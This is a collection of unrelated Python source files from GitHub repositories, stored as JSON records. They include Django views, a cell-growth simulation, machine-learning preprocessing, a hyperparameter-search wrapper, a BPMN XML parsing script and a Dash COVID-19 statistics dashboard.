[\n {'name': 'Nomencladores'},\n {'name': 'Países', 'href': reverse_lazy('paises')}\n ]\n return context\n\n\nclass RegistrarPaisView(PermissionRequiredMixin, CreateView):\n model = Pais\n template_name = \"pais/pais_form.html\"\n form_class = PaisForm\n success_url = reverse_lazy('paises')\n permission = 'nomencladores.add_pais'\n\n def get_context_data(self, **kwargs):\n context = super(RegistrarPaisView, self).get_context_data(**kwargs)\n context['form'] = self.form_class\n context['titulo'] = 'Registrar país'\n context['titulo_tabla'] = 'Registrar'\n context['subtitulo_tabla'] = 'país'\n context['icono_form'] = 'plus'\n context['activar_nomencladores'] = True\n context['path'] = [\n {'name': 'Nomencladores'},\n {'name': 'País', 'href': reverse_lazy('paises')},\n {'name': 'Registrar', 'href': reverse_lazy('registrar_pais')}\n ]\n return context\n\n def form_valid(self, form):\n form.save()\n messages.add_message(self.request, messages.SUCCESS, \"País agregado con éxito.\")\n return super(RegistrarPaisView, self).form_valid(form)\n\n\nclass ModificarPaisView(PermissionRequiredMixin, UpdateView):\n model = Pais\n template_name = \"pais/pais_form.html\"\n form_class = PaisForm\n success_url = reverse_lazy('paises')\n permission = 'nomencladores.change_pais'\n\n def get_context_data(self, **kwargs):\n context = super(ModificarPaisView, 
self).get_context_data(**kwargs)\n context['titulo'] = 'Modificar país'\n context['titulo_tabla'] = \"Modificar\"\n context['subtitulo_tabla'] = \"país\"\n context['icono_form'] = 'edit'\n context['activar_nomencladores'] = True\n context['path'] = [\n {'name': 'Nomencladores'},\n {'name': 'País', 'href': reverse_lazy('paises')},\n {'name': 'Modificar', 'href': reverse_lazy('modificar_pais', kwargs={'pk': self.kwargs['pk']})},\n ]\n return context\n\n def form_valid(self, form):\n form.save()\n messages.add_message(self.request, messages.SUCCESS, \"País modificado con éxito.\")\n return super(ModificarPaisView, self).form_valid(form)\n\n\nclass HabilitarPaisView(PermissionRequiredMixin, View):\n permission = 'nomencladores.enable_pais'\n\n def get(self, request, *args, **kwargs):\n pais = Pais.objects.get(id=self.kwargs['pk'])\n pais.activo = True\n pais.save()\n messages.add_message(request, messages.SUCCESS, \"País habilitado con éxito.\")\n return JsonResponse({})\n\n\nclass DeshabilitarPaisView(PermissionRequiredMixin, View):\n permission = 'nomencladores.disable_pais'\n\n def get(self, request, *args, **kwargs):\n pais = Pais.objects.get(id=self.kwargs['pk'])\n pais.activo = False\n pais.save()\n messages.add_message(request, messages.SUCCESS, \"País deshabilitado con éxito.\")\n return JsonResponse({})\n\n","repo_name":"freecubankasper/EppEstudio","sub_path":"eppEstudio50/nomencladores/views/pais.py","file_name":"pais.py","file_ext":"py","file_size_in_byte":4038,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"41372900297","text":"\ndef my_pow(num):\n \"Calculates power 2 of a given number!\"\n return num ** 2\n\n\n\nprint(help(abs), \"\\n\", help(int), \"\\n\", help(len), \"\\n\", help(my_pow))\n\nprint(abs.__doc__)\n\n\n\"\"\"\n\nprint(abs.__doc__)\nprint(int.__doc__)\nprint(input.__doc__)\n\ndef square(num):\n '''Return the square value of the input number.\n \n The input number must be integer.\n '''\n return num ** 2\n\nprint(square(2))\nprint(square.__doc__)\n\n\"\"\"","repo_name":"MuhammetALAPAN/Python-Exercises","sub_path":"Beginner/q24.py","file_name":"q24.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"10126435950","text":"import numpy as np\nfrom vivarium import DivideCondition, MetaDivision\nfrom vivarium.core.process import Process, Composer\n\nfrom vivarium.core.composition import composer_in_experiment\n\n\nclass Growth(Process):\n defaults = {\n 'growth_rate': 5e-4}\n\n def __init__(self, parameters=None):\n super().__init__(parameters)\n\n def ports_schema(self):\n return {\n 'biomass': {\n '_default': 1.0,\n '_emit': True,\n '_divider': 'split',\n }\n }\n\n def initial_state(self, config):\n return {\n 'biomass': 10.0}\n\n def next_update(self, timestep, states):\n biomass = states['biomass']\n total_biomass = biomass * np.exp(self.parameters['growth_rate'] * timestep)\n delta_biomass = total_biomass - states['biomass']\n return {\n 'biomass': delta_biomass}\n\n\nclass Expression(Process):\n defaults = {\n 'expression_rate': 1e-1}\n\n def ports_schema(self):\n return {\n 'biomass': {},\n 'genes': {\n '*': {\n 'activation': {'_default': 0.0},\n 'copy_number': {\n '_default': 1,\n '_emit': True,\n }}},\n 'proteins': {\n '*': {\n 'count': {\n '_default': 0,\n '_divider': 'split',\n '_emit': True,\n },\n 'mw': {'_default': 1}}}}\n\n def initial_state(self, config):\n return {\n 'genes': {\n 'growth': {\n 
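Growth.next_update above returns the biomass increment of exponential growth over one timestep, delta = B * (exp(r * dt) - 1), rather than the new total, since vivarium's default updater accumulates deltas onto the state. A quick numeric check with illustrative values:

import numpy as np

biomass, growth_rate, timestep = 10.0, 1e-1, 5.0
delta = biomass * np.exp(growth_rate * timestep) - biomass
print(round(delta, 3))  # 6.487, i.e. 10 * (e**0.5 - 1)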
'activation': 1.0,\n 'copy_number': 1}},\n 'proteins': {\n 'growth': {\n 'count': 10,\n 'mw': 1.0}}}\n\n def next_update(self, timestep, states):\n biomass = states['biomass']\n genes = states['genes']\n proteins = states['proteins']\n\n protein_created = {}\n biomass_used = 0\n for gene, gene_state in genes.items():\n protein_created[gene] = self.parameters['expression_rate'] * biomass * timestep * gene_state['activation'] * gene_state['copy_number']\n biomass_used += protein_created[gene] * proteins[gene]['mw']\n\n update = {\n 'biomass': -biomass_used,\n 'proteins': {\n protein: {\n 'count': count}\n for protein, count in protein_created.items()}}\n return update\n\n\nclass Replication(Process):\n defaults = {\n 'elongation_rate': 10,\n 'nucleotide_mw': 0.01} # base pairs / second\n\n def ports_schema(self):\n return {\n 'biomass': {},\n 'dna_polymerase_position': {\n '_default': 0.0},\n 'genes': {\n '*': {\n 'activation': {'_default': 0.0},\n 'copy_number': {\n '_default': 1,\n '_divider': 'split'},\n 'length': {'_default': 1000.0},\n }\n }\n }\n\n def initial_state(self, config):\n return {\n 'dna_polymerase_position': 0.0}\n\n def next_update(self, timestep, states):\n position = states['dna_polymerase_position']\n position_delta = self.parameters['elongation_rate'] * timestep\n new_position = position + position_delta\n biomass_used = position_delta * self.parameters['nucleotide_mw']\n\n update = {\n 'biomass': -biomass_used,\n 'genes': {}}\n\n cursor = 0.0\n for gene_key, gene in states['genes'].items():\n cursor += gene['length']\n if position < cursor and cursor <= new_position:\n update['genes'][gene_key] = {}\n update['genes'][gene_key]['copy_number'] = states['genes'][gene_key]['copy_number']\n \n if new_position >= cursor:\n update['dna_polymerase_position'] = position_delta - cursor\n else:\n update['dna_polymerase_position'] = position_delta\n\n return update\n\n\nclass Cell(Composer):\n defaults = {\n 'growth': {},\n 'expression': {},\n 'replication': {},\n 'divide_condition': {\n 'threshold': 20},\n 'daughter_path': tuple(),\n 'agents_path': tuple(),\n }\n\n def generate_processes(self, config):\n\n # division config\n daughter_path = config['daughter_path']\n agent_id = config['agent_id']\n division_config = dict(\n config.get('division', {}),\n daughter_path=daughter_path,\n agent_id=agent_id,\n composer=self)\n\n return {\n 'growth': Growth(config['growth']),\n 'expression': Expression(config['expression']),\n 'replication': Replication(config['replication']),\n 'divide_condition': DivideCondition(config['divide_condition']),\n 'meta_division': MetaDivision(division_config),\n # 'burst': Burst(),\n }\n\n def generate_topology(self, config):\n return {\n 'growth': {\n 'biomass': ('biomass',),\n },\n 'expression': {\n 'biomass': ('biomass',),\n 'genes': ('genes',),\n 'proteins': ('proteins',)},\n 'replication': {\n 'biomass': ('biomass',),\n 'genes': ('genes',),\n 'dna_polymerase_position': ('dna', 'polymerase_position')\n },\n 'divide_condition': {\n 'variable': ('biomass',),\n 'divide': ('boundary', 'divide',),\n },\n 'meta_division': {\n 'global': ('boundary',),\n 'agents': config['agents_path'],\n },\n # 'burst': {}\n }\n\n\ndef test_cell():\n cell_config = {\n 'agent_id': '1',\n 'agents_path': ('agents',),\n 'growth': {'growth_rate': 1e-1},\n }\n cell_composer = Cell(cell_config)\n initial_state = {\n 'agents': {\n '1': cell_composer.initial_state()}}\n\n cell_experiment = composer_in_experiment(\n cell_composer,\n initial_state=initial_state,\n 
outer_path=('agents', '1'))\n\n cell_experiment.update(10)\n\n timeseries = cell_experiment.emitter.get_timeseries()\n\n\nif __name__ == '__main__':\n test_cell()\n","repo_name":"vivarium-collective/phage-cycle","sub_path":"phage_cycle/composites/cell.py","file_name":"cell.py","file_ext":"py","file_size_in_byte":6470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"7699926770","text":"import pandas as pd\nimport numpy as np\nfrom sklearn import preprocessing,cross_validation,svm,neighbors\nfrom sklearn.decomposition import PCA\nfrom sklearn.model_selection import train_test_split\nimport time\nimport matplotlib.pyplot as plt\nimport csv\nfrom fancyimpute import KNN , IterativeImputer \nfrom MICE import MiceImputer\n# from fancyimpute import MICE as MICE\ndf_train = pd.read_csv(\"../Training_dataset_Original.csv\")\n\nprint(df_train.shape)\n\n# def remove_outlier(df_in, col_name):\n# q1 = df_in[col_name].quantile(0.001)\n# q3 = df_in[col_name].quantile(0.99)\n# iqr = q3-q1\n# fence_low = q1-1.5*iqr\n# fence_high = q3+1.5*iqr\n# df_out = df_in.loc[(df_in[col_name] > fence_low) & (df_in[col_name] < fence_high)]\n# return df_out\n\n# keys = df_train.keys()\n# for key in keys:\n# \tif(\"mvar\" in key and key not in ['mvar11','mvar41','mvar40','mvar31','mvar23','mvar30', 'mvar22', 'mvar21','mvar14','mvar4','mvar5','mvar18','mvar35','mvar39','mvar45','mvar46','mvar47']):\n# \t\tdf_train = remove_outlier(df_train, key)\n\n\n\ndf_test = pd.read_csv(\"../Leaderboard_dataset.csv\")\nprint(df_test.shape)\n\nrid = np.array(df_test['application_key'])\ny = np.array(df_train['default_ind'])\n\n\ndf_train = df_train.drop(['default_ind', 'application_key'],1)\ndf_test = df_test.drop(['application_key'],1)\n\ntrain_size = len(df_train)\ndf_train = df_train.append(df_test)\n\n\n\ndf_train = df_train.drop(['mvar11','mvar41','mvar40','mvar31','mvar23'], axis=1 )\ndf_train = df_train.drop(['mvar30', 'mvar22', 'mvar21'], axis=1)\n# df_train = df_train.drop(['mvar6', 'mvar8', 'mvar12', 'mvar16', 'mvar24'], axis=1)\n# df_train = df_train.drop(['mvar14','mvar4','mvar5','mvar18','mvar35','mvar39','mvar45','mvar46'], axis=1)\n\nkeys = df_train.keys()\nmapping = {'C':0,'L':1}\ndf_train = df_train.replace({'mvar47':mapping})\n\n\n\n\ndf_train.fillna(df_train.mean(),inplace=True)\n\n# for key in df_train.keys():\n# \tif(\"mvar\" in key and \"mvar47\" not in key):\n# \t\tdf_train[key] = df_train.groupby(\"mvar47\").transform(lambda x: x.fillna(x.mean()))\n\nscaler = preprocessing.StandardScaler()\ndf = df_train\nprint(df_train.describe())\ndf_train = pd.DataFrame(scaler.fit_transform(df_train))\ndf_train.columns = df.columns\ndf_train.index = df.index\n\npca = PCA(n_components=25)\nprincipalComponents = pca.fit_transform(df_train)\nprincipalDf = pd.DataFrame(data = principalComponents)\ndf_train = principalDf\n\n\n\n\n\n\n\ndf_test = df_train[train_size:]\ndf_train = df_train[:train_size]\n\n\ndf_train[\"default_ind\"] = y\ndf_test[\"application_key\"] = rid\n\ndf_test.to_csv(\"../test_final1.csv\", index=False);\ndf_train.to_csv(\"../train_final1.csv\", index=False);\n","repo_name":"sahilchaturvedi/CreditCard-Defaulter","sub_path":"code_rf.py","file_name":"code_rf.py","file_ext":"py","file_size_in_byte":2618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"69800158832","text":"from ...models import paciente\nfrom ..modelo.Paciente import Paciente\n'''\n@package Control\n@version: 0.1.20\n@author: 
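The preprocessing in code_rf.py above standardizes the stacked train-plus-test frame and projects it onto 25 principal components. The same two steps expressed as a scikit-learn pipeline on synthetic data (a sketch, not the competition dataset):

import numpy as np
from sklearn.pipeline import make_pipeline
from sklearn.preprocessing import StandardScaler
from sklearn.decomposition import PCA

X = np.random.RandomState(0).rand(100, 40)  # synthetic stand-in features
pipeline = make_pipeline(StandardScaler(), PCA(n_components=25))
X_reduced = pipeline.fit_transform(X)
print(X_reduced.shape)  # (100, 25)

Note that fitting the scaler and PCA on train and test together, as the original script does, leaks test-set statistics into the transform; fitting on the training rows alone avoids that.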
Olman Castilla, Fernanda Alvarado y Yonnattan Serrano\nDocumentation for a class.\nClase DaoBDPaciente.\n'''\n\n\nclass DaoBDPaciente:\n def __init__(self):\n # The constructor.\n self.dato = None\n '''\n Documentation guardar_informacion_paciente.\n @param self :\n @param datos : DTOPaciente\n @return true\n '''\n def guardar_informacion_paciente(self, datos):\n try:\n self.dato = paciente(edad=datos.edad,\n estimacion_edad=datos.estimacion_edad,\n url_imagen=datos.url_imagen,\n nombre=datos.nombre,\n apellido_1=datos.apellido_1,\n apellido_2=datos.apellido_2,\n cedula=datos.cedula,\n hospital=datos.hospital)\n self.dato.save()\n except:\n return False\n return True\n def cargar_informacion(self):\n \n return paciente.objects.all()","repo_name":"olman1995/ASC-Proyecto-IS-2018","sub_path":"website/main/back_end/control/DaoBDPaciente.py","file_name":"DaoBDPaciente.py","file_ext":"py","file_size_in_byte":1131,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"3456142420","text":"# Author: Tanish Shinde\n# Email: simon.blanke@yahoo.com\n# License: MIT License\n\nimport time\nimport warnings\n\nfrom .main_args import MainArgs\nfrom .opt_args import Arguments\n\nfrom . import (\n HillClimbingOptimizer,\n StochasticHillClimbingOptimizer,\n TabuOptimizer,\n RandomSearchOptimizer,\n RandomRestartHillClimbingOptimizer,\n RandomAnnealingOptimizer,\n SimulatedAnnealingOptimizer,\n StochasticTunnelingOptimizer,\n ParallelTemperingOptimizer,\n ParticleSwarmOptimizer,\n EvolutionStrategyOptimizer,\n BayesianOptimizer,\n)\n\n\ndef stop_warnings():\n # because sklearn warnings are annoying when they appear 100 times\n def warn(*args, **kwargs):\n pass\n\n import warnings\n\n warnings.warn = warn\n\n\nclass Cypher:\n \"\"\"\n Optimization main class.\n \"\"\"\n\n def __init__(self, X, y, memory=True, random_state=1, verbosity=2, warnings=False):\n \"\"\"\n \n Parameters:\n X: array-like or None\n Training input samples used during the optimization process.\n The training data is passed to the ``X`` argument in the objective function during the optimization process.\n You can also pass ``None`` if you want to optimize an objective function that does not contain a machine learning model.\n\n y: array-like or None\n Training target values used during the optimization process.\n The target values are passed to the ``y`` argument in the objective function during the optimization process.\n You can also pass ``None`` if you want to optimize an objective function that does not contain a machine learning model.\n\n memory: bool, optional (default: True)\n\n random_state: int, optional (default: 1)\n\n verbosity: int, optional (default: 2)\n\n warnings: bool, optional (default: False)\n\n \n Returns:\n --------\n None\n \n \"\"\"\n self._main_args_ = MainArgs(X, y, memory, random_state, verbosity)\n\n if not warnings:\n stop_warnings()\n\n self.optimizer_dict = {\n \"HillClimbing\": HillClimbingOptimizer,\n \"StochasticHillClimbing\": StochasticHillClimbingOptimizer,\n \"TabuSearch\": TabuOptimizer,\n \"RandomSearch\": RandomSearchOptimizer,\n \"RandomRestartHillClimbing\": RandomRestartHillClimbingOptimizer,\n \"RandomAnnealing\": RandomAnnealingOptimizer,\n \"SimulatedAnnealing\": SimulatedAnnealingOptimizer,\n \"StochasticTunneling\": StochasticTunnelingOptimizer,\n \"ParallelTempering\": ParallelTemperingOptimizer,\n \"ParticleSwarm\": ParticleSwarmOptimizer,\n \"EvolutionStrategy\": EvolutionStrategyOptimizer,\n \"Bayesian\": BayesianOptimizer,\n 
}\n\n def search(\n self,\n search_config,\n max_time=None,\n n_iter=10,\n optimizer=\"RandomSearch\",\n n_jobs=1,\n warm_start=False,\n scatter_init=False,\n ):\n \"\"\"\n run search\n \n Parameters\n ----------\n search_config: dictionary\n Defines the search space and links it to the objective function. \n The objective function is the key of the dictionary, while the search space (which is also a dictionary) is the value.\n You can define multiple modeles/search-spaces in the search_config.\n The values within the search space (not search_config) must be lists or numpy arrays.\n \n Example:\n def model_function(para, X, y):\n model = GradientBoostingClassifier(\n n_estimators=para[\"n_estimators\"],\n max_depth=para[\"max_depth\"],\n )\n scores = cross_val_score(model, X, y, cv=3)\n\n return scores.mean()\n\n\n search_config = {\n model_function: {\n \"n_estimators\": range(10, 200, 10),\n \"max_depth\": range(2, 12),\n }\n }\n \n \n max_time: float, optional (default: None)\n \n n_iter: int, optional (default: 10)\n \n optimizer: string or dict, optional (default: \"RandomSearch\")\n \n n_jobs: int, optional (default: 1)\n \n warm_start: dict, optional (default: False)\n \n scatter_init: int, optional (default: False)\n \n \n Returns\n -------\n None\n \n \"\"\"\n\n start_time = time.time()\n\n self._main_args_.search_args(\n search_config, max_time, n_iter, optimizer, n_jobs, warm_start, scatter_init\n )\n self._opt_args_ = Arguments(self._main_args_.opt_para)\n optimizer_class = self.optimizer_dict[self._main_args_.optimizer]\n\n try:\n import ray\n\n if ray.is_initialized():\n ray_ = True\n else:\n ray_ = False\n except ImportError:\n warnings.warn(\"failed to import ray\", ImportWarning)\n ray_ = False\n\n if ray_:\n optimizer_class = ray.remote(optimizer_class)\n opts = [\n optimizer_class.remote(self._main_args_, self._opt_args_)\n for job in range(self._main_args_.n_jobs)\n ]\n searches = [\n opt.search.remote(job, ray_=ray_) for job, opt in enumerate(opts)\n ]\n ray.get(searches)\n else:\n self._optimizer_ = optimizer_class(self._main_args_, self._opt_args_)\n self._optimizer_.search()\n\n self.results_params = self._optimizer_.results_params\n self.results_models = self._optimizer_.results_models\n\n self.pos_list = self._optimizer_.pos_list\n self.score_list = self._optimizer_.score_list\n\n self.total_time = time.time() - start_time\n\n def get_total_time(self):\n return self.total_time\n\n def get_eval_time(self):\n return self._optimizer_.eval_time\n\n def save_report(self):\n pass\n","repo_name":"vcs1977/Cypher","sub_path":"cypher/cypher.py","file_name":"cypher.py","file_ext":"py","file_size_in_byte":6122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"16512740743","text":"import logging\n\ntry:\n import xml.etree.cElementTree as ET\nexcept ImportError:\n import xml.etree.ElementTree as ET\n\nimport sys\n\ntry:\n\tfileName = sys.argv[1]\nexcept Exception as e:\n\tlogging.error(\"Usage:python xmltest filename\")\n\texit()\n\n# read file\ntry:\n\t#tree = ET.ElementTree(file='bpmn/new.bpmn')\n\ttree = ET.ElementTree(file=fileName)\n\tfileName\nexcept Exception as e:\n\tlogging.error(\"Error:File not found\"+str(e))\n\texit()\n\n# root element\nroot = tree.getroot()\n\n# Testing code\n'''\n# print everything\nfor elem in tree.iter():\n\tprint (\"TAG: %s ATTRIB: %s\" % (elem.tag, elem.attrib))\n\n# search for tasks\nprint (\">>>>>>>>>>>>>>>>>>>>>>>>>>>> JUST TASKS <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<\")\nfor elem 
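When Ray is already initialized, search above wraps the optimizer class with ray.remote and launches one remote search per job, gathering them with ray.get. The dispatch pattern in isolation, assuming ray is installed (the worker function is a stand-in for the optimizer, not Cypher's real class):

import ray

@ray.remote
def run_search(job):
    # Stand-in for optimizer_class(...).search(job, ray_=True)
    return job * job

ray.init(num_cpus=2)
print(ray.get([run_search.remote(job) for job in range(4)]))  # [0, 1, 4, 9]
ray.shutdown()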
in tree.iter(tag='{http://www.omg.org/spec/BPMN/20100524/MODEL}task'):\t\n\ttaskName = elem.attrib['name']\n\ttaskID = elem.attrib['id']\n\tbehaviourName = taskID+\"_behaviour\"\n\t#add behaviour element\n\telem.set('behaviour',behaviourName)\n\tprint (\"TAG: %s ATTRIB: %s\" % (elem.tag, elem.attrib))\n\tprint (elem.attrib['name'])\n'''\n# add behaviours\nfor elem in tree.iter(tag='{http://www.omg.org/spec/BPMN/20100524/MODEL}task'):\t\n\ttaskName = elem.attrib['name']\n\ttaskID = elem.attrib['id']\n\tbehaviourName = taskID+\"_behaviour\"\n\t#add behaviour element\n\telem.set('behaviour',behaviourName)\n\n\t\n\n\nprint(\"# COPY PASTE FROM HERE\")\nprint(\"# define behaviours\")\nfor elem in tree.iter(tag='{http://www.omg.org/spec/BPMN/20100524/MODEL}task'):\t\n\tprint (\"%s = {'Name': '%s', 'averageTime': 7, 'silentFail': 5, 'completionFail': 5}\" % (elem.attrib['behaviour'], elem.attrib['behaviour']))\n\nprint(\"# define tasks\")\nprint(\"tasks = {\")\nfor elem in tree.iter(tag='{http://www.omg.org/spec/BPMN/20100524/MODEL}task'):\t\n\tprint (\"'%s' : {'Name': '%s', 'behaviour': %s},\" % (elem.attrib['id'], elem.attrib['name'], elem.attrib['behaviour']))\n\nprint(\"}\")\t","repo_name":"information-catalyst/iproduce-digital-twin-development-toolkit","sub_path":"services/icebasicdigitaltwinanimator/xmltest.py","file_name":"xmltest.py","file_ext":"py","file_size_in_byte":1824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"44094854735","text":"#!/usr/bin/nv python3\n#\n######################\n# Covid-19 Stats App #\n######################\n#\n# BY: Chadless1\n#\n# Description: Pulls data from mytimes github and uses dash to display charts and graphs \n# analyzing the data by the US and each individual state\n#\nimport pandas as pd\nimport numpy as np\nimport datetime \n\nimport dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output\nimport plotly.express as px\n\n# Read csv file from github\n# State Data\nurl = 'https://raw.githubusercontent.com/nytimes/covid-19-data/master/us-states.csv'\n\ndf_states = pd.read_csv(url)\n\n# Read csv file from github\n# County Data\n\n#state Codes\nus_state_abbrev = {\n 'Alabama': 'AL',\n 'Alaska': 'AK',\n 'American Samoa': 'AS',\n 'Arizona': 'AZ',\n 'Arkansas': 'AR',\n 'California': 'CA',\n 'Colorado': 'CO',\n 'Connecticut': 'CT',\n 'Delaware': 'DE',\n 'District of Columbia': 'DC',\n 'Florida': 'FL',\n 'Georgia': 'GA',\n 'Guam': 'GU',\n 'Hawaii': 'HI',\n 'Idaho': 'ID',\n 'Illinois': 'IL',\n 'Indiana': 'IN',\n 'Iowa': 'IA',\n 'Kansas': 'KS',\n 'Kentucky': 'KY',\n 'Louisiana': 'LA',\n 'Maine': 'ME',\n 'Maryland': 'MD',\n 'Massachusetts': 'MA',\n 'Michigan': 'MI',\n 'Minnesota': 'MN',\n 'Mississippi': 'MS',\n 'Missouri': 'MO',\n 'Montana': 'MT',\n 'Nebraska': 'NE',\n 'Nevada': 'NV',\n 'New Hampshire': 'NH',\n 'New Jersey': 'NJ',\n 'New Mexico': 'NM',\n 'New York': 'NY',\n 'North Carolina': 'NC',\n 'North Dakota': 'ND',\n 'Northern Mariana Islands':'MP',\n 'Ohio': 'OH',\n 'Oklahoma': 'OK',\n 'Oregon': 'OR',\n 'Pennsylvania': 'PA',\n 'Puerto Rico': 'PR',\n 'Rhode Island': 'RI',\n 'South Carolina': 'SC',\n 'South Dakota': 'SD',\n 'Tennessee': 'TN',\n 'Texas': 'TX',\n 'Utah': 'UT',\n 'Vermont': 'VT',\n 'Virgin Islands': 'VI',\n 'Virginia': 'VA',\n 'Washington': 'WA',\n 'West Virginia': 'WV',\n 'Wisconsin': 'WI',\n 'Wyoming': 'WY'\n}\n\nurl2 = 'https://raw.githubusercontent.com/nytimes/covid-19-data/master/us-counties.csv'\n\ndf = 
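The tag='{http://www.omg.org/spec/BPMN/20100524/MODEL}task' filter above is ElementTree's Clark notation: a namespaced tag is written as {namespace-uri}localname. A self-contained demonstration with a tiny BPMN-like document:

import xml.etree.ElementTree as ET

BPMN_NS = '{http://www.omg.org/spec/BPMN/20100524/MODEL}'
xml = ('<definitions xmlns="http://www.omg.org/spec/BPMN/20100524/MODEL">'
       '<task id="t1" name="Review order"/>'
       '</definitions>')
root = ET.fromstring(xml)
for task in root.iter(tag=BPMN_NS + 'task'):
    print(task.attrib['id'], task.attrib['name'])  # t1 Review order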
pd.read_csv(url2)\n\n# Filter for last date\ntoday = df['date'].iloc[-1]\n\ndf = df[df['date'] == today]\n\ndf = df.replace(us_state_abbrev)\n\ndf = df.groupby('state')['cases'].sum()\n\n# Plot\nfig = px.choropleth(df, locations=df.index,\n scope='usa',\n color='cases',\n locationmode='USA-states',\n range_color=(0,1000000),\n title='Cases per State',\n )\n\n# Create Date objects\n\ndf_states['date'] = pd.to_datetime(df_states['date'])\n\ndate = df_states['date'].iloc[-1]\ndate = date.strftime('%m-%d-%Y')\n\n############\n# Dash App #\n############\napp = dash.Dash(__name__)\n\n# Layout\napp.layout = html.Div(children=[\n\n # Header image and title\n html.Header(\n html.Div([ \n \n html.Img(src=app.get_asset_url('c19.jpeg')),\n\n html.H1('Covid-19 Data'),\n\n ],className='head')\n\n ),\n\n html.Br(),\n \n # Intro / Date / Links\n html.P('Data on Covid-19 Case Numbers and Deaths for the United States. Search by State and find out more about your area.'),\n \n html.P('Data is currently valid from *{}*'.format(date)),\n\n html.A('data source', href='https://github.com/nytimes/covid-19-data/'),\n\n html.Br(),\n\n html.A('code source', href='https://github.com/chadless1/c19-stats-app/'),\n\n # Line break\n html.Br(),\n html.Hr(),\n html.Br(),\n \n # Tabs\n dcc.Tabs(id=\"tabs\", value='tab-1', children=[\n \n dcc.Tab(label='USA', value='tab-1'),\n dcc.Tab(label='Data By State', value='tab-2'),\n\n ], style={'width': '90%', 'margin': 'auto', 'box-shadow': '0 1px 3px rgba(0,0,0,0.12), 0 1px 2px rgba(0,0,0,0.24)'}, colors={'border': 'grey', 'background': '#082255', 'primary': 'black'}),\n \n # Tab contnent\n html.Div(id='tabs-content'),\n\n ]) # main div tag\n # End of app layout\n\n###########################################################\n# CallBacks #\n###########################################################\n\n# Tab Callbacks\n@app.callback(Output('tabs-content', 'children'),\n [Input('tabs', 'value')])\n\ndef render_content(tab):\n \n # US Case and Death Calculations\n today = df_states['date'].iloc[-1]\n\n df_usa = df_states[df_states['date'] == today]\n \n usa_total_cases = df_usa['cases'].sum()\n usa_total_deaths = df_usa['deaths'].sum()\n\n usa_total_df = df_states[['cases','deaths']].groupby(df_states['date'])\n usa_total_df = usa_total_df.sum()\n\n usa_last = usa_total_df.tail()\n\n # Calculate % Change in Cases and Death\n usa_case_percent = (usa_total_df['cases'].iloc[-1] - usa_total_df['cases'].iloc[-5]) / usa_total_df['cases'].iloc[-5] * 100\n usa_case_percent = round(usa_case_percent, 2)\n\n usa_death_percent = (usa_total_df['deaths'].iloc[-1] - usa_total_df['deaths'].iloc[-5]) / usa_total_df['deaths'].iloc[-5] * 100\n usa_death_percent = round(usa_death_percent, 2)\n \n # New df for graphs\n dff = df_states.groupby('date')[['cases', 'deaths']].sum()\n \n dff = dff.diff()\n dff = dff.fillna(0)\n\n dff_tail = dff.tail() \n\n # Tab 1\n if tab == 'tab-1':\n return html.Div([\n\n html.Div([\n\n html.Br(),\n html.H3('USA Data'),\n html.Br(),\n\n ] ,className='row'),\n\n # Main Div\n html.Div([\n\n # USA Cases\n html.Div([\n\n html.H4('Total Cases'),\n html.H3('{:,}'.format(usa_total_cases)),\n\n ],className='four columns'),\n \n # USA Deaths\n html.Div([\n\n html.H4('Total Deaths'),\n\n html.H3('{:,}'.format(usa_total_deaths)),\n\n ],className='four columns'),\n \n # Choropleth map\n html.Div([\n\n dcc.Graph(figure=fig),\n\n ],className='twelve columns'),\n\n # USA Case Change\n html.Div([\n\n html.H4('Case Change %'),\n\n html.H3('{:,}%'.format(usa_case_percent)),\n html.P('over 
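Because the NYT series are cumulative, the dashboard recovers daily new cases above by grouping on date, summing, then applying diff() and fillna(0). The idea in miniature:

import pandas as pd

cumulative = pd.Series([100, 110, 120, 150],
                       index=pd.date_range('2021-01-01', periods=4))
daily_new = cumulative.diff().fillna(0)
print(daily_new.tolist())  # [0.0, 10.0, 10.0, 30.0]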
last 5 Days'),\n\n ],className='four columns'),\n \n # USA Death Change\n html.Div([\n\n html.H4('Death Change %'),\n\n html.H3('{:,}%'.format(usa_death_percent)),\n html.P('over last 5 Days'),\n\n\n ],className='four columns'),\n\n ]),\n\n html.Br(),\n \n # Graphs\n html.Div([\n\n dcc.Graph(\n\n figure={\n\n 'data': [\n \n {'x': dff.index, 'y': dff['cases'].values, 'type': 'line', 'name': 'cases'},\n {'x': dff.index, 'y': dff['deaths'].values, 'type': 'line', 'name': 'deaths'},\n\n ],\n\n 'layout': {\n 'title': 'Cases & Deaths',\n #'height': 310,\n 'paper_bgcolor': '#082255',\n 'plot_bgcolor': '#082255',\n 'font': {'color': 'white'},\n\n }}\n\n ),\n\n ],className='five columns'),\n\n html.Div([\n\n dcc.Graph(\n\n figure={\n\n 'data': [\n \n {'x': dff_tail.index, 'y': dff_tail['cases'].values, 'type': 'bar', 'name': 'cases'},\n\n ],\n\n 'layout': {\n 'title': 'Cases Last 5 Days',\n #'height': 310,\n 'paper_bgcolor': '#082255',\n 'plot_bgcolor': '#082255',\n 'font': {'color': 'white'},\n \n }}\n\n ),\n\n ],className='five columns'),\n\n html.Div([\n\n dcc.Graph(\n\n figure={\n\n 'data': [\n \n {'x': dff_tail.index, 'y': dff_tail['deaths'].values, 'type': 'bar', 'name': 'deaths', 'marker': {'color': 'orange'}},\n\n ],\n\n 'layout': {\n 'title': 'Deaths Last 5 Days',\n #'height': 310,\n 'paper_bgcolor': '#082255',\n 'plot_bgcolor': '#082255',\n 'font': {'color': 'white'},\n \n }}\n\n ),\n\n ],className='five columns'),\n\n\n \n ],className='container')\n\n #########################################################\n # End Tab1\n \n elif tab == 'tab-2':\n return html.Div([\n \n # Tab 2 Content #\n #################\n\n # States\n html.H3('Select State'),\n \n html.Div([\n 